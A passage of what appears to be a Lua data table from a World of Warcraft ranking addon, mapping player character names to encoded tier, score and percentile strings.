["Fydollaho"] = "RB:429/57%UM:389/41%",
["Cute"] = "LB:766/98%SM:1008/99%",
["Hlgh"] = "RM:561/58%",
["Kopecz"] = "EB:642/84%EM:716/78%",
["Cannibul"] = "CB:123/13%RM:525/58%",
["Bubblewrap"] = "EM:810/86%",
["Roiheenok"] = "RB:530/68%RM:608/65%",
["Tangtangtang"] = "EB:641/83%LM:941/95%",
["Zelpho"] = "CM:29/1%",
["Teta"] = "UM:471/48%",
["Thardyll"] = "UB:203/38%EM:533/78%",
["Yeetyeett"] = "CB:110/13%UM:317/32%",
["Wayllosp"] = "EM:809/88%",
["Pingdoo"] = "RB:463/61%EM:692/75%",
["Kevnish"] = "RB:404/52%RM:606/63%",
["Rosel"] = "CB:151/18%RM:481/52%",
["Hairtoss"] = "CB:35/2%RM:544/60%",
["Healthbox"] = "UM:26/32%",
["Milkbuns"] = "EM:740/80%",
["Yiminge"] = "CM:98/8%",
["Oouncledom"] = "UB:380/48%RM:588/63%",
["Skylus"] = "EM:755/81%",
["Benjii"] = "EB:716/91%LM:937/95%",
["Grayden"] = "CB:26/0%UM:270/27%",
["Oriannah"] = "EB:587/76%EM:830/86%",
["Anartin"] = "RB:523/67%EM:820/85%",
["Nabore"] = "EB:687/92%LM:926/96%",
["Chonkadonk"] = "CB:51/3%RM:635/70%",
["Miirkat"] = "RM:377/56%",
["Servo"] = "EB:675/87%EM:914/92%",
["Flyinbrian"] = "EB:690/89%LM:921/95%",
["Xéna"] = "CB:58/6%UM:264/26%",
["Thescream"] = "CB:42/4%UM:457/48%",
["Fearx"] = "EB:669/86%EM:829/86%",
["Precious"] = "RM:492/54%",
["Angeli"] = "UB:379/49%RM:671/71%",
["Tangdiddlez"] = "UB:256/32%RM:532/58%",
["Xieyuan"] = "CM:84/6%",
["Rayse"] = "CM:26/0%",
["Pikabull"] = "CM:31/1%",
["Eightmm"] = "CM:107/9%",
["Hakunama"] = "RM:578/62%",
["Hmoobtuakoj"] = "EB:727/91%EM:864/88%",
["Shorthaircat"] = "CB:36/20%EM:598/76%",
["Tomed"] = "UB:213/25%RM:631/67%",
["Hidu"] = "CM:136/12%",
["Unlighted"] = "CM:230/22%",
["Flamingtable"] = "EB:672/85%EM:882/90%",
["Robbersl"] = "RB:474/61%EM:731/77%",
["Steriophonic"] = "RB:537/70%RM:616/64%",
["Minorities"] = "CB:106/11%RM:476/52%",
["Sumfinwong"] = "UM:175/34%",
["Rire"] = "EM:726/79%",
["Deephaus"] = "UM:373/39%",
["Brinacey"] = "RB:458/61%EM:691/75%",
["Visdomr"] = "RB:465/62%RM:525/58%",
["Syrup"] = "RM:540/59%",
["Kainzo"] = "RB:433/59%EM:765/83%",
["Armaros"] = "LB:747/97%SM:977/99%",
["Bofrost"] = "RB:526/70%RM:577/63%",
["Agè"] = "EB:733/92%EM:788/82%",
["Sinsane"] = "RB:486/62%EM:877/90%",
["Milfurian"] = "CB:65/7%RM:627/67%",
["Detroitsmash"] = "UM:448/45%",
["Palatium"] = "CB:46/2%UM:403/43%",
["Umibozu"] = "CM:35/1%",
["Çucuy"] = "CM:156/14%",
["Nobutasu"] = "CM:25/0%",
["Misci"] = "CB:81/9%CM:160/15%",
["Babywantmilk"] = "UB:303/39%UM:431/47%",
["Thairadin"] = "RB:408/55%RM:533/58%",
["Keegone"] = "UM:382/41%",
["Cptfillmore"] = "UB:384/46%RM:671/72%",
["Dertysam"] = "EB:651/92%LM:911/97%",
["Clern"] = "EB:620/79%EM:884/90%",
["Dazont"] = "CM:96/9%",
["Blufish"] = "EM:743/81%",
["Eliena"] = "UM:287/29%",
["Matchaice"] = "RB:419/51%RM:636/68%",
["Duhblksheep"] = "LB:717/95%EM:792/83%",
["Memor"] = "CM:214/20%",
["Heuksoojeo"] = "EB:738/93%EM:893/92%",
["Hordespy"] = "CM:33/2%",
["Kosacica"] = "RM:556/59%",
["Paintpot"] = "EM:563/79%",
["Heyren"] = "LB:737/96%EM:880/93%",
["Sinfernos"] = "UB:379/47%RM:659/70%",
["Crayonshin"] = "CB:140/16%UM:436/47%",
["Mandoo"] = "EB:712/91%EM:878/91%",
["Powr"] = "UM:78/27%",
["Hexatank"] = "RB:291/72%EM:619/79%",
["Dontkissme"] = "UM:267/46%",
["Moonspeaker"] = "CB:29/1%CM:175/16%",
["Zingshot"] = "EB:728/92%EM:853/88%",
["Bigoldack"] = "UB:359/42%UM:461/48%",
["Creation"] = "RB:387/51%EM:821/87%",
["Litrabbi"] = "CB:90/22%CM:56/6%",
["Climber"] = "RB:452/59%SM:1006/99%",
["Vaseera"] = "RB:556/71%EM:710/75%",
["Laeknir"] = "EB:577/80%EM:763/83%",
["Eternaquil"] = "EB:624/81%EM:748/78%",
["Satele"] = "RB:479/71%EM:669/83%",
["Highwhey"] = "RM:461/50%",
["Spunkin"] = "CM:34/1%",
["Sixelsyn"] = "UB:215/27%RM:482/53%",
["Irullan"] = "RB:425/58%EM:736/79%",
["Chadou"] = "RB:437/72%EM:747/87%",
["Virtualself"] = "UM:419/44%",
["Acero"] = "CM:145/16%",
["Icerr"] = "EB:585/77%EM:732/77%",
["Tearz"] = "EB:690/88%LM:978/98%",
["Littlewizard"] = "UM:348/35%",
["Wilcojones"] = "UB:341/42%RM:703/74%",
["Vancandy"] = "RB:445/61%EM:706/77%",
["Castial"] = "CB:61/6%CM:30/1%",
["Goldfire"] = "CM:74/6%",
["Damaa"] = "CM:58/4%",
["Bobdam"] = "RM:442/63%",
["Voldemortx"] = "RB:514/71%EM:684/81%",
["Holypriestt"] = "RM:556/61%",
["Janefox"] = "CB:27/0%CM:154/14%",
["Shazz"] = "EB:587/75%LM:962/96%",
["Swag"] = "UM:294/30%",
["Comicewallow"] = "CM:102/9%",
["Zahk"] = "UT:310/41%UB:227/30%CM:104/16%",
["Roflfrost"] = "CM:28/0%",
["Hanina"] = "ET:329/92%UB:191/48%EM:476/86%",
["Nstar"] = "EB:581/77%EM:766/82%",
["Shamtown"] = "RM:310/50%",
["Sekke"] = "UM:319/32%",
["Freakcolin"] = "RB:462/60%RM:654/68%",
["Gorlga"] = "EM:748/82%",
["Vladlord"] = "UM:292/30%",
["Metasploit"] = "EB:677/91%LM:919/95%",
["Ravine"] = "CB:32/2%UM:247/25%",
["Spirithunk"] = "CB:101/10%RM:606/67%",
["Maladath"] = "UB:336/38%RM:745/70%",
["Seamoar"] = "RB:400/52%EM:849/89%",
["Thugdraft"] = "CM:185/19%",
["Veeshanx"] = "RB:395/53%EM:719/78%",
["Bevila"] = "ET:257/82%EB:575/83%RM:248/74%",
["Morbidangel"] = "CB:178/21%UM:403/43%",
["Supervillain"] = "ET:666/86%EB:738/93%EM:842/87%",
["Chiprockets"] = "CM:27/0%",
["Grogmon"] = "CM:158/15%",
["Notlokio"] = "EB:610/80%EM:796/85%",
["Hoekiv"] = "CM:141/15%",
["Snafued"] = "CB:140/17%RM:773/74%",
["Magelol"] = "CB:26/0%UM:455/49%",
["Malnourished"] = "UB:270/35%UM:270/27%",
["Willshift"] = "EB:668/90%EM:777/84%",
["Xalsfer"] = "CM:209/21%",
["Xals"] = "RB:523/70%EM:852/86%",
["Freakyzeke"] = "UM:330/33%",
["Angrybargy"] = "UB:309/39%EM:796/78%",
["Trashboy"] = "RB:489/62%EM:672/83%",
["Monsteroxo"] = "CM:89/13%",
["Hyperfly"] = "UB:253/44%RM:496/70%",
["Showhan"] = "CT:32/2%UB:391/49%RM:241/55%",
["Cherrblooss"] = "UB:237/29%UM:313/31%",
["Onemm"] = "RB:512/71%RM:535/70%",
["Aoeobq"] = "RB:494/66%EM:735/83%",
["Gracee"] = "RB:455/65%EM:472/86%",
["Qsir"] = "CM:106/9%",
["Avrixy"] = "UB:295/38%RM:493/54%",
["Aquariustw"] = "UT:192/40%EB:672/89%EM:718/85%",
["Viktok"] = "UB:313/38%RM:659/70%",
["Corium"] = "RM:491/54%",
["Nukeleus"] = "CB:74/9%UM:243/29%",
["Goomie"] = "RB:451/62%RM:557/62%",
["Icerog"] = "CB:37/4%UM:317/32%",
["Siin"] = "EB:646/82%EM:932/93%",
["Faeyn"] = "UB:205/25%RM:652/72%",
["Nefaerie"] = "CB:42/3%CM:185/17%",
["Swadbus"] = "CM:191/18%",
["Deadlyshank"] = "RB:477/61%RM:644/69%",
["Nekkro"] = "RB:535/74%EM:832/88%",
["Fest"] = "RB:495/66%EM:698/76%",
["Antifreeze"] = "RM:538/59%",
["Garyrotter"] = "EB:573/76%EM:900/93%",
["Shawnye"] = "LB:784/98%LM:949/96%",
["Mallows"] = "CB:28/1%CM:70/5%",
["Zirlock"] = "CM:222/22%",
["Gotortillias"] = "RB:489/63%EM:744/78%",
["Lit"] = "RB:471/59%EM:906/90%",
["Hellobaby"] = "RB:323/63%EM:652/85%",
["Roxogar"] = "UM:270/27%",
["Adaris"] = "RB:577/74%EM:877/90%",
["Feralol"] = "EB:669/90%EM:752/82%",
["Nailitok"] = "CM:188/18%",
["Grimmyreaper"] = "CB:29/1%CM:49/4%",
["Vanillasalt"] = "EB:602/77%EM:837/82%",
["Yakapo"] = "RB:453/59%EM:724/76%",
["Rogez"] = "EB:595/76%EM:771/80%",
["Aydalina"] = "EB:656/83%EM:826/86%",
["Jaderham"] = "CM:30/3%",
["Roodjay"] = "RB:428/56%EM:784/84%",
["Dildore"] = "UB:243/26%UM:428/44%",
["Basedx"] = "EB:671/85%EM:888/91%",
["Sunbbang"] = "EB:687/86%LM:928/95%",
["Ogibear"] = "EB:733/92%LM:958/96%",
["Thotdog"] = "CM:37/5%",
["Dizzang"] = "UB:261/32%EM:770/76%",
["Alis"] = "EB:611/84%EM:702/77%",
["Maxxum"] = "RB:570/73%EM:899/92%",
["Sweetee"] = "EB:584/77%EM:831/88%",
["Bero"] = "RB:447/61%RM:529/58%",
["Noctuare"] = "EB:715/90%SM:1009/99%",
["Virtual"] = "EB:638/83%EM:859/90%",
["Ryakaki"] = "EB:677/90%EM:829/88%",
["Nothing"] = "EB:743/93%SM:1006/99%",
["Pürge"] = "EB:700/92%LM:919/97%",
["Gennya"] = "EB:665/84%LM:958/97%",
["Swift"] = "EB:607/80%EM:820/87%",
["Enen"] = "UT:317/44%RB:571/73%EM:817/93%",
["Warrioro"] = "RB:485/61%RM:778/74%",
["Quickminute"] = "RB:305/65%CM:55/17%",
["Liljay"] = "EB:726/92%SM:1012/99%",
["Stunilingus"] = "RB:411/52%EM:870/89%",
["Mootea"] = "CB:159/19%RM:670/71%",
["Icedrake"] = "CM:29/1%",
["Lopin"] = "CB:151/16%CM:231/23%",
["Ixchelle"] = "EB:619/84%RM:585/65%",
["Nigita"] = "RB:437/57%UM:402/41%",
["Dreamzies"] = "RB:503/66%EM:753/78%",
["Cheesybread"] = "RB:535/70%RM:648/62%",
["Simthug"] = "RB:391/53%EM:657/82%",
["Tül"] = "UB:245/31%UM:376/40%",
["Ellheals"] = "RB:472/65%EM:724/79%",
["Whomboom"] = "UB:313/39%EM:707/75%",
["Zuth"] = "RB:403/55%RM:525/58%",
["Rockak"] = "RB:499/65%EM:854/88%",
["Qres"] = "CM:56/5%",
["Drdreidel"] = "EB:557/77%EM:895/94%",
["Rotten"] = "EM:772/83%",
["Sxmmy"] = "RM:622/66%",
["Aslock"] = "RB:492/64%EM:768/76%",
["Lucretius"] = "RB:539/69%LM:967/97%",
["Hawtt"] = "CB:31/2%CM:77/6%",
["Trikpally"] = "UB:255/32%RM:628/69%",
["Pissmop"] = "EB:624/79%EM:798/83%",
["Trubben"] = "RB:557/71%EM:735/78%",
["Drunkpriest"] = "EB:545/81%EM:825/91%",
["Canderus"] = "UB:264/29%UM:358/36%",
["Lemongoober"] = "UB:257/31%RM:527/56%",
["Thenoob"] = "RT:114/57%UB:42/25%RM:492/66%",
["Adoah"] = "UM:422/44%",
["Virale"] = "EB:592/76%EM:859/88%",
["Slicy"] = "EB:588/75%EM:800/83%",
["Vialo"] = "CM:201/19%",
["Alcove"] = "RB:510/71%EM:774/84%",
["Pt"] = "EB:572/75%EM:780/77%",
["Corisa"] = "UM:375/39%",
["Stourne"] = "UM:265/48%",
["Ayahh"] = "UB:383/49%RM:649/69%",
["Drochner"] = "CM:94/8%",
["Supersmite"] = "EB:691/87%LM:982/98%",
["Spallisaur"] = "EB:671/91%LM:953/98%",
["Bizzl"] = "RB:480/66%RM:511/59%",
["Rylanor"] = "LB:739/96%EM:898/93%",
["Deathdefy"] = "EB:620/80%EM:822/85%",
["Lamneth"] = "LB:745/97%EM:906/94%",
["Nooch"] = "EB:732/92%SM:1004/99%",
["Sufur"] = "UB:355/41%EM:794/83%",
["Imagineric"] = "EB:743/93%SM:1021/99%",
["Uhhahuh"] = "EB:734/93%LM:964/97%",
["Buckchainz"] = "CM:225/21%",
["Macnjacks"] = "LB:762/97%SM:979/99%",
["Shorts"] = "LB:773/97%EM:888/92%",
["Shockonator"] = "EB:721/94%SM:986/99%",
["Beardzley"] = "LT:778/98%SB:808/99%SM:1028/99%",
["Jabronz"] = "EB:732/92%LM:983/98%",
["Modz"] = "UM:344/35%",
["Kenome"] = "EB:691/87%SM:998/99%",
["Ruonar"] = "RB:507/67%EM:879/90%",
["Dracorll"] = "ET:637/84%SB:805/99%LM:973/98%",
["Epsilene"] = "SB:832/99%SM:1014/99%",
["Kmc"] = "EB:674/86%EM:891/91%",
["Udderlunacy"] = "LB:713/96%EM:520/88%",
["Mcswiggin"] = "RB:433/55%RM:630/67%",
["Ilcooltusks"] = "UM:263/26%",
["Aaq"] = "EB:707/90%EM:895/91%",
["Shadai"] = "EB:653/88%EM:823/88%",
["Valencïa"] = "EB:658/91%LM:890/95%",
["Blockkake"] = "UM:308/32%",
["Bodaddy"] = "UM:274/27%",
["Ceruleus"] = "UB:371/46%RM:698/74%",
["Stabathaa"] = "CM:30/2%",
["Murrlin"] = "CM:40/2%",
["Girlgnome"] = "EB:692/89%EM:858/90%",
["Marclivis"] = "RM:527/56%",
["Gozu"] = "CB:62/16%",
["Beerbrat"] = "CM:4/4%",
["Thewraith"] = "EB:712/89%EM:924/94%",
["Redmoonmaple"] = "CM:32/1%",
["Shadowstealz"] = "CM:181/21%",
["Snat"] = "UM:322/32%",
["Kobold"] = "ET:325/86%EB:656/85%EM:739/94%",
["Taurenscat"] = "CB:45/4%CM:98/8%",
["Vaunt"] = "UB:319/40%RM:616/66%",
["Rhonstine"] = "EB:560/78%EM:824/89%",
["Koss"] = "CM:234/23%",
["Thacoldest"] = "CM:154/14%",
["Dicel"] = "CM:158/15%",
["Kromach"] = "RB:492/62%RM:547/58%",
["Dualhurt"] = "RM:351/66%",
["Stevevacucci"] = "EM:743/76%",
["Amananar"] = "UB:260/33%RM:572/63%",
["Goodevil"] = "CB:122/12%UM:318/33%",
["Lynea"] = "EB:628/88%LM:956/98%",
["Leeif"] = "RB:426/54%UM:313/32%",
["Hmoobforsho"] = "UM:389/42%",
["Superwizard"] = "CM:57/6%",
["Gnova"] = "UM:256/26%",
["Poobert"] = "CM:244/24%",
["Trina"] = "CB:202/24%UM:350/37%",
["Shipshafter"] = "CM:28/0%",
["Helmund"] = "CB:77/7%CM:93/7%",
["Swagnificent"] = "EB:681/86%LM:942/96%",
["Nefuria"] = "CM:28/0%",
["Backpedalin"] = "UB:244/30%RM:526/55%",
["Derbs"] = "UB:275/36%UM:382/40%",
["Grimdalf"] = "CM:98/8%",
["Irronstone"] = "UB:201/25%UM:419/42%",
["Petal"] = "RB:463/69%EM:689/84%",
["Pargus"] = "UB:148/41%RM:270/58%",
["Gigapudding"] = "CB:36/3%CM:229/23%",
["Neckface"] = "EB:595/76%EM:818/85%",
["Juwcë"] = "RM:423/71%",
["Madmartigan"] = "RB:331/54%RM:339/56%",
["Neska"] = "UB:319/40%EM:753/79%",
["Cadahunt"] = "UM:435/45%",
["Clegain"] = "EM:595/78%",
["Blurn"] = "EB:738/94%EM:874/91%",
["Cajones"] = "EB:677/91%LM:966/98%",
["Oldsaltygpa"] = "RB:408/55%EM:758/83%",
["Peebz"] = "EB:617/78%EM:888/91%",
["Dyrimar"] = "RB:493/63%EM:818/84%",
["Tygrant"] = "LT:761/98%SB:828/99%LM:872/95%",
["Spankstank"] = "RB:580/74%EM:777/81%",
["Sagoth"] = "EB:540/78%EM:732/89%",
["Flapmaster"] = "ST:776/99%SB:845/99%SM:1061/99%",
["Dijinnie"] = "EB:660/89%EM:895/93%",
["Kombinator"] = "EB:618/80%EM:893/92%",
["Soldrath"] = "EB:628/81%EM:886/89%",
["Psykotick"] = "RB:550/73%EM:753/81%",
["Tributeruner"] = "RM:674/72%",
["Jagerboi"] = "RB:522/69%EM:829/82%",
["Motig"] = "EB:594/87%LM:912/97%",
["Beeftartar"] = "CB:44/3%UM:442/48%",
["Fallenshogun"] = "RB:565/74%EM:726/75%",
["Taazdingoe"] = "EB:693/88%EM:929/94%",
["Urabus"] = "EB:740/94%LM:936/95%",
["Retiredflufr"] = "RB:424/71%EM:844/92%",
["Taargus"] = "EB:559/78%EM:869/92%",
["Latro"] = "RB:419/54%RM:679/72%",
["Cinshadow"] = "UM:306/31%",
["Giiorno"] = "CM:75/6%",
["Kuddlez"] = "UB:202/25%UM:266/26%",
["Dirkmcgirk"] = "RM:477/50%",
["Maliva"] = "CT:58/21%RM:516/54%",
["Crazywarlock"] = "RM:653/68%",
["Giggleshoot"] = "RB:435/59%RM:305/67%",
["Scaringgirls"] = "RB:457/61%EM:674/78%",
["Kittykitte"] = "RB:496/64%EM:732/77%",
["Olyver"] = "RB:443/55%RM:651/70%",
["Zannen"] = "RB:452/59%RM:521/53%",
["Porcsword"] = "RB:492/62%RM:524/56%",
["Frostmancer"] = "RB:396/52%EM:695/76%",
["Mcmini"] = "UB:308/40%EM:830/84%",
["Luckyshots"] = "UB:251/31%RM:694/73%",
["Wiryshot"] = "EB:741/93%LM:943/95%",
["Khaleryn"] = "EB:632/80%EM:886/91%",
["Tórmund"] = "UM:434/45%",
["Oleum"] = "UM:468/48%",
["Fafurion"] = "RB:493/69%RM:520/57%",
["Heavyshield"] = "ET:362/85%EB:694/92%EM:693/78%",
["Psalmfoolery"] = "CM:113/9%",
["Darcall"] = "UB:207/38%RM:403/62%",
["Yuqtwo"] = "CB:65/7%EM:764/80%",
["Liliy"] = "CM:69/7%",
["Rocku"] = "RB:409/52%EM:762/80%",
["Elsoxx"] = "EB:517/79%EM:734/86%",
["Rpgbutturk"] = "CM:161/15%",
["Ekkx"] = "UM:322/33%",
["Valy"] = "EB:570/81%LM:951/96%",
["Beleetra"] = "UM:440/48%",
["Lebronjamea"] = "RB:404/52%RM:607/65%",
["Azenn"] = "EM:712/78%",
["Cisz"] = "CM:61/4%",
["Boofed"] = "RB:237/54%RM:401/72%",
["Stardreamer"] = "RT:564/71%EB:614/86%EM:741/86%",
["Aven"] = "UM:325/34%",
["Darkmercy"] = "EB:531/84%LM:928/97%",
["Bigb"] = "RB:410/53%RM:513/52%",
["Wrahil"] = "EB:422/76%EM:733/88%",
["Frst"] = "UM:272/28%",
["Picanha"] = "RB:511/65%EM:823/86%",
["Owned"] = "UB:346/40%RM:569/61%",
["Atheldene"] = "UB:83/49%RM:510/71%",
["Creavent"] = "CM:147/15%",
["Tulura"] = "UM:299/30%",
["Tumzs"] = "CM:91/11%",
["Chilledcow"] = "RB:443/58%RM:694/74%",
["Wattabata"] = "CM:136/12%",
["Jackrabit"] = "CB:202/21%UM:457/47%",
["Lisenary"] = "CM:128/11%",
["Séph"] = "RM:528/73%",
["Touchoflight"] = "UM:409/44%",
["Driad"] = "RM:419/67%",
["Valerette"] = "UB:328/41%UM:355/36%",
["Xplained"] = "UB:238/30%RM:553/61%",
["Mursteak"] = "CB:190/23%EM:716/76%",
["Phrye"] = "CB:67/7%UM:326/34%",
["Hemia"] = "CB:149/18%UM:464/49%",
["Bloodfeather"] = "UM:318/32%",
["Smiteftw"] = "RB:293/58%EM:716/85%",
["Duffrin"] = "CB:26/0%CM:135/15%",
["Lascerate"] = "RM:750/72%",
["Leglesslucy"] = "LB:712/95%EM:820/89%",
["Studyhard"] = "UB:273/34%RM:705/73%",
["Lanm"] = "RB:369/50%EM:693/76%",
["Duhsleep"] = "UM:434/46%",
["Agh"] = "RB:585/74%RM:562/60%",
["Ironmolly"] = "UB:248/44%RM:528/73%",
["Pestí"] = "RB:480/61%EM:888/88%",
["Fenrie"] = "UM:353/37%",
["Opalmoon"] = "RM:613/66%",
["Saltii"] = "RB:476/65%RM:658/70%",
["Hogsqueezen"] = "CM:26/0%",
["Gregydrood"] = "EB:547/76%EM:872/92%",
["Moonhalf"] = "RB:466/62%EM:831/84%",
["Soyb"] = "UM:254/46%",
["Tigrishkoala"] = "EB:384/77%EM:786/82%",
["Austinmorrow"] = "CM:115/10%",
["Chickgurl"] = "CB:189/24%RM:519/57%",
["Sensation"] = "CM:129/14%",
["Vonstroke"] = "UB:265/33%RM:528/54%",
["Fabled"] = "CM:27/0%",
["Harcko"] = "CM:200/20%",
["Terry"] = "RM:491/67%",
["Chadgor"] = "CM:239/23%",
["Lurpy"] = "RM:317/72%",
["Sohn"] = "RM:492/54%",
["Stillshade"] = "UB:264/34%UM:371/39%",
["Sazuk"] = "RB:553/70%EM:855/84%",
["Real"] = "EB:578/76%EM:868/91%",
["Arakk"] = "RB:522/66%RM:699/74%",
["Decryption"] = "EB:644/88%EM:829/89%",
["Srirachaa"] = "UM:135/47%",
["Margot"] = "UB:226/27%RM:521/56%",
["Sherin"] = "EB:618/78%EM:747/79%",
["Skook"] = "RB:507/64%EM:834/81%",
["Elliott"] = "LB:743/97%LM:933/96%",
["Winter"] = "ET:470/88%LB:753/97%LM:897/97%",
["Venitas"] = "LB:754/95%LM:973/97%",
["Wellbeing"] = "LB:740/97%LM:931/97%",
["Slicerdicer"] = "EB:654/83%EM:831/86%",
["Starbois"] = "UB:385/49%RM:630/65%",
["Tokahontas"] = "UB:353/45%RM:638/68%",
["Fargo"] = "UM:349/36%",
["Shaweh"] = "RM:427/66%",
["Filthyacts"] = "UB:257/33%RM:522/69%",
["Elison"] = "UM:426/46%",
["Fyouseek"] = "UB:216/26%EM:707/75%",
["Okrigg"] = "RM:232/56%",
["Olii"] = "EB:691/89%EM:917/94%",
["Pyne"] = "EB:549/76%RM:526/57%",
["Airiko"] = "EB:653/83%EM:929/93%",
["Tyler"] = "UB:260/35%RM:488/57%",
["Shubaduba"] = "RB:470/62%EM:742/78%",
["Grank"] = "EB:597/76%EM:723/76%",
["Gunderson"] = "CB:60/6%EM:825/82%",
["Minotarded"] = "EB:578/79%EM:865/91%",
["Doughboy"] = "EB:595/78%EM:757/81%",
["Mikewill"] = "EB:595/81%EM:823/93%",
["Ipuck"] = "UM:262/26%",
["Unashamed"] = "EM:707/78%",
["Rahgar"] = "UM:61/25%",
["Tekknique"] = "CM:144/19%",
["Ellakryie"] = "CM:85/10%",
["Omarlittlee"] = "RB:271/55%EM:620/83%",
["Compounds"] = "RB:419/58%EM:708/78%",
["Bethsuda"] = "UM:290/29%",
["Valorie"] = "EB:553/76%EM:819/88%",
["Astee"] = "CM:120/11%",
["Parpar"] = "RM:527/58%",
["Agma"] = "UB:215/26%UM:316/33%",
["Threeloko"] = "CT:99/12%RB:516/68%EM:714/77%",
["Joboo"] = "CM:46/3%",
["Justice"] = "RB:327/67%EM:855/93%",
["Spìke"] = "UM:397/40%",
["Innae"] = "RB:530/74%RM:552/61%",
["Beaudriver"] = "RM:616/68%",
["Yotoh"] = "EB:665/86%EM:736/79%",
["Wsp"] = "RM:434/67%",
["Purecrazy"] = "UM:370/37%",
["Bainaq"] = "EM:762/83%",
["Brien"] = "RM:535/59%",
["Mmonster"] = "CM:62/9%",
["Puffbuffpass"] = "CB:70/7%UM:443/49%",
["Brownie"] = "RM:742/72%",
["Thiccdumper"] = "EB:716/91%EM:884/90%",
["Merika"] = "UM:430/46%",
["Bann"] = "EM:932/94%",
["Takanya"] = "UB:201/25%CM:231/22%",
["Qiijo"] = "CM:239/24%",
["Bercdci"] = "UB:213/26%UM:400/41%",
["Maetoria"] = "EB:597/78%EM:764/80%",
["Tokijin"] = "UM:312/32%",
["Deadlyfrost"] = "UM:403/43%",
["Talq"] = "EB:568/75%EM:880/92%",
["Angrytoilet"] = "UM:323/41%",
["Coldflames"] = "UT:361/47%CB:152/18%RM:482/60%",
["Shadowtongue"] = "CM:34/1%",
["Flimzak"] = "CM:67/5%",
["Gazoo"] = "RB:561/74%RM:648/71%",
["Istari"] = "RB:495/66%EM:821/87%",
["Ganesh"] = "EM:797/91%",
["Skullmarker"] = "RB:493/62%EM:805/84%",
["Adversary"] = "UB:330/43%RM:599/66%",
["Whalestoory"] = "EB:636/80%EM:871/90%",
["Blurns"] = "CM:236/24%",
["Kimya"] = "CM:42/3%",
["Sebudai"] = "RB:565/74%EM:851/87%",
["Ouo"] = "CM:76/12%",
["Genty"] = "UM:288/29%",
["Saosis"] = "CM:171/24%",
["Khaom"] = "CB:158/16%UM:358/36%",
["Flago"] = "CB:185/22%UM:408/44%",
["Voodoomage"] = "CM:132/21%",
["Pma"] = "EB:619/79%LM:966/96%",
["Stumphumper"] = "UB:362/48%EM:737/79%",
["Cinnamona"] = "EB:512/75%EM:890/94%",
["Vanlom"] = "CB:169/21%RM:583/64%",
["Pepito"] = "RB:580/74%EM:928/93%",
["Rexxa"] = "EB:649/89%LM:948/97%",
["Incompetent"] = "LB:716/95%LM:902/95%",
["Pnuemer"] = "CB:32/1%UM:260/26%",
["Concur"] = "UM:394/40%",
["Giosslol"] = "CT:45/14%RB:433/58%RM:311/63%",
["Rihannsu"] = "UB:350/44%RM:510/52%",
["Milticket"] = "EB:647/82%EM:901/92%",
["Shlick"] = "EB:579/80%EM:726/80%",
["Heffsay"] = "EB:630/86%LM:943/97%",
["Vacnar"] = "UB:245/29%CM:134/13%",
["Winnervate"] = "UB:342/45%UM:352/37%",
["Posthuman"] = "EB:606/80%EM:799/85%",
["Ugla"] = "CM:157/14%",
["Honed"] = "LB:755/95%EM:928/94%",
["Dookoo"] = "CB:126/13%UM:261/26%",
["Charzi"] = "EB:700/94%SM:950/99%",
["Chocolatt"] = "EB:634/87%EM:874/91%",
["Trunx"] = "EB:634/91%EM:845/94%",
["Warriorsname"] = "CB:207/22%CM:210/21%",
["Llhyr"] = "RM:351/61%",
["Whatasap"] = "UM:466/49%",
["Trist"] = "UB:391/49%EM:726/76%",
["Bonesnstuff"] = "CM:141/13%",
["Bonjwa"] = "UB:311/35%RM:695/74%",
["Aiur"] = "LB:727/96%SM:972/99%",
["Gzxiaokeai"] = "CB:28/1%",
["Chenhaonan"] = "CB:33/3%",
["Samoose"] = "CM:63/5%",
["Oneply"] = "CM:58/5%",
["Duckie"] = "CT:65/9%CB:90/9%CM:36/20%",
["Zinos"] = "CM:27/0%",
["Torque"] = "RM:557/58%",
["Oldscl"] = "RB:385/50%RM:647/71%",
["Ghostyo"] = "UB:243/31%RM:615/68%",
["Gregypooh"] = "EB:645/87%EM:791/89%",
["Wätërbõi"] = "CB:198/24%RM:704/73%",
["Ssp"] = "RB:430/53%EM:761/80%",
["Bigshow"] = "RB:479/66%RM:271/72%",
["Wusaa"] = "RB:422/54%RM:590/61%",
["Laooda"] = "UB:216/27%UM:412/42%",
["Xumin"] = "RB:439/54%EM:744/78%",
["Gundii"] = "UB:350/45%RM:639/68%",
["Lagihunter"] = "RB:542/72%RM:594/65%",
["Flashcody"] = "CB:203/24%RM:541/58%",
["Boopy"] = "RB:559/73%EM:781/82%",
["Hemorrhagic"] = "RM:580/62%",
["Furà"] = "ET:770/93%LB:609/97%LM:971/98%",
["Attie"] = "UT:95/44%EB:590/89%EM:710/89%",
["Velgande"] = "CB:38/4%UM:326/33%",
["Iamorc"] = "CM:39/3%",
["Hotlineblink"] = "RM:612/67%",
["Gachii"] = "CB:170/21%UM:264/27%",
["Creamytotem"] = "EB:659/88%EM:768/83%",
["Bouk"] = "CB:91/10%UM:331/33%",
["Wyndigo"] = "RB:516/66%RM:496/53%",
["Shwingy"] = "RB:437/57%RM:537/57%",
["Fallenhqø"] = "UB:285/48%RM:341/56%",
["Insult"] = "EB:610/80%EM:861/90%",
["Wazitdo"] = "CM:27/0%",
["Tinysheep"] = "CB:136/16%CM:121/12%",
["Crocs"] = "EB:726/92%EM:765/82%",
["Glozart"] = "RB:509/68%RM:536/59%",
["Cracks"] = "EB:662/86%EM:899/91%",
["Nightshang"] = "EB:517/83%EM:725/89%",
["Sayden"] = "CB:130/15%UM:354/37%",
["Chako"] = "EB:681/87%EM:888/89%",
["Instantdope"] = "CB:103/12%RM:483/51%",
["Bawld"] = "EB:628/85%EM:878/92%",
["Disneyplus"] = "RB:447/57%RM:628/67%",
["Brulak"] = "UB:375/47%EM:717/76%",
["Shotzman"] = "RB:435/54%RM:557/59%",
["Monty"] = "UB:40/25%EM:746/87%",
["Hairless"] = "RM:480/50%",
["Fraublücher"] = "UB:314/40%EM:689/75%",
["Iamacowama"] = "RM:394/69%",
["Seroko"] = "RB:450/57%EM:881/90%",
["Psilocybear"] = "UM:131/46%",
["Frostmallet"] = "CB:186/19%UM:269/27%",
["Coolsoda"] = "CM:121/11%",
["Neio"] = "EB:653/84%EM:786/82%",
["Zeemo"] = "EB:615/84%EM:793/85%",
["Sleezeball"] = "RB:406/51%EM:824/85%",
["Forgotheal"] = "CB:117/12%UM:326/34%",
["Dotorii"] = "RB:423/55%RM:556/57%",
["Frozenaqua"] = "LB:772/97%LM:930/95%",
["Miyuki"] = "UM:375/45%",
["Emikz"] = "EB:639/83%EM:931/94%",
["Shockadln"] = "RM:617/68%",
["Meltas"] = "RB:531/74%EM:878/92%",
["Rastafaraen"] = "RB:438/60%RM:565/63%",
